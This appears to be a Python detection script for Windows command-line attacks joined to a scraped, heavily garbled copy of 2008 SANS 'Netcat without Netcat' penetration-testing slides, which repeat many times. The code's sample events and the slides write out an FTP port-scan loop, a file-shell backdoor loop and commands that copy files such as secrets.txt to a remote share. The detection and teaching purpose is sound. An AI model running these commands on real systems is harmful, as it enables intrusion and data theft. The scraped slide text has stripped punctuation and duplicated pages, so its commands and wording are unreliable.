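    "for_l_loop": re.compile(r"for\s+/L\s+%%?\w\s+in\s*\(", re.I),
    # a "for /L" loop whose step is 0 never terminates: (1,0,2) on the file-shell slide
    "infinite_for_l_loop": re.compile(
        r"for\s+/L\s+%%?\w\s+in\s*\(\s*\d+\s*,\s*0\s*,\s*\d+\s*\)", re.I),
    # "cmd.exe /c <loop variable> ... ping -n N 127.0.0.1": run a line read from
    # a file, then sleep with ping (the file-shell body)
    "file_shell_body": re.compile(
        r"cmd(\.exe)?\s+/c\s+%%?\w\b.*ping\s+-n\s+\d+\s+127\.0\.0\.1", re.I | re.S),
    # stdout/stderr redirected straight to a UNC path: "> \\host\share\file"
    "redirect_to_unc": re.compile(r">>?\s*\\\\[^\\\s]+\\[^\\\s]+\\", re.I),
}


def matching_rules(command_line: str) -> Set[str]:
    """Names of every rule whose pattern appears in the command line."""
    return {name for name, pat in RULES.items() if pat.search(command_line)}


def verdict(rules: Set[str]) -> Optional[str]:
    """Collapse rule hits on one command line into a single verdict.

    The more specific combinations are tested first, so the file shell is
    reported as such rather than merely as 'a for /L loop'.
    """
    if {"infinite_for_l_loop", "file_shell_body"} <= rules:
        return "file-shell backdoor loop"
    if {"ftp_script_file", "for_l_loop"} <= rules:
        return "ftp-client port scan loop"
    if "ftp_script_file" in rules:
        return "ftp driven by script file"
    if "redirect_to_unc" in rules:
        return "command output redirected to network share"
    return None


def scan_events(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each verdict to the command lines that produced it."""
    report: Dict[str, List[str]] = {}
    for ev in events:
        v = verdict(matching_rules(ev["cmdline"]))
        if v is not None:
            report.setdefault(v, []).append(ev["cmdline"])
    return report


# Constructed sample events (hosts, shares and file names are made up).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c for /L %i in (1,1,1024) do echo open 10.0.0.5 %i > ftp.txt"
                " & echo quit >> ftp.txt & ftp -s:ftp.txt"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c type secrets.txt > \\10.0.0.7\share\secrets.txt"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt)'
                " do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1"},
    # benign: an interactive ftp session and a plain local ping
    {"image": r"C:\Windows\System32\ftp.exe", "cmdline": "ftp ftp.example.com"},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ping -n 4 127.0.0.1"},
]


if __name__ == "__main__":
    for label, lines in scan_events(SAMPLE_EVENTS).items():
        for line in lines:
            print(f"[{label}] {line}")
```

A second, independent signal for the file shell is file-system churn: commands.txt repeatedly created and deleted on a share while output.txt keeps growing.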
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 35
The File Shell In Action
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 36
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 37
Conclusions
• Netcat without Netcat shows that with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 38
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 39
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Page 29
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 30
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 31
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 32
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 33
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home/On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008